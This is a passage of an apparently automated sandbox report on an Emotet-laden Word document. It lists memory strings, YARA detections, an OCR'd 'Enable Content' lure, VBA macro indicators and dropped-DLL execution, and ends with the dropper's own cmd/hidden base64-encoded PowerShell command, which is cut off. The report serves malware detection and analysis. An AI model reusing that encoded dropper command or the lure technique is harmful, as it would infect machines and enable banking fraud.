                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/adaptive.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox.css?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquer0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.iLightBox.min.js?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.script.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.tweet.min.js?ver=1.3.1
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jqueryLibraries.min.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jsLibraries.min.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/2020/01/Logo.png
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_colors_primary.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_colors_secondary.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_fonts.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/wlwmanifest.xml
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-json/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/xmlrpc.php
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/xmlrpc.php?rsd
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://settings.outlook.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://staging.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://tasks.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.8.2/css/all.css?ver=5.5.3
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://webshell.suite.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://wus2-000.contentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com/training/b/
                Source: powershell.exe, 00000004.00000002.697183346.0000027114743000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.comArAC
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://www.odwebp.svc.ms
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownHTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. End of document W Screen 1
                Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. End of document W Screen 1 of 1 O Type here to
                Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                Powershell drops PE fileShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJump to dropped file
                Very long command line foundShow sources
                Source: unknownProcess created: Commandline size = 7856
                Source: unknownProcess created: Commandline size = 7765
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7765
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Ezfa\Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30D7F
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30D87
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30CD0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30D30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000D270
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10011EA7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10012750
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10012B5C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001237C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10012F7C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4D4F6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F450E1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F576E8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F59CD7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4ECCD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5A0B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F53A9F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F59A13
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F46212
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4241B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4CDF7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F42FF8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F543CB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4B5A9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F51D81
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F41577
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F54572
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F52766
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4DB62
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F44D3C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F55D25
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A711
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F45B1F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F51AD1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F45EDF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F42CDA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4EEC4
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F588C2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F532B2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F514BB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4AEA0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A8AE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F59494
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F50E90
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5A29B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F41673
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F56C51
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4CA31
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F52433
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F58225
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F41013
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4E800
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F49E02
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F50609
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F41BF7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F483F0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4C3FE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4AFF9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F445F9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F48FE5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F471EC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4F1ED
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4E1E9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4D7D7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F497DE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F57FCC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F521B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4B7BC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F493AD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F515AF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F487AA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F44390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4C19E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F50B86
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4BF80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F46F7B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4196F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5915E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4EB26
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F44B26
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4FD22
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5410D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F43F0E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4F908
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F51108
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F46509
                Source: v22Pc0qA.doc.docOLE, VBA macro line: Private Sub Document_open()
                Source: VBA code instrumentationOLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open
                Source: v22Pc0qA.doc.docOLE indicator, VBA macros: true
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000B078 appears 46 times
                Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: Chpieog.dll.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.999260733061
                Source: classification engineClassification label: mal100.troj.evad.winDOC@16/14@3/7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F590E0 CreateToolhelp32Snapshot,
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{6A94A75C-BF67-4F59-849A-17E54DA728FF} - OProcSessId.datJump to behavior
                Source: v22Pc0qA.doc.docOLE indicator, Word Document stream: true
                Source: v22Pc0qA.doc.docOLE document summary: title field not present or empty
                Source: v22Pc0qA.doc.docOLE document summary: edited time not present or 0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: v22Pc0qA.doc.docVirustotal: Detection: 72%
                Source: v22Pc0qA.doc.docMetadefender: Detection: 44%
                Source: v22Pc0qA.doc.docReversingLabs: Detection: 86%
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJ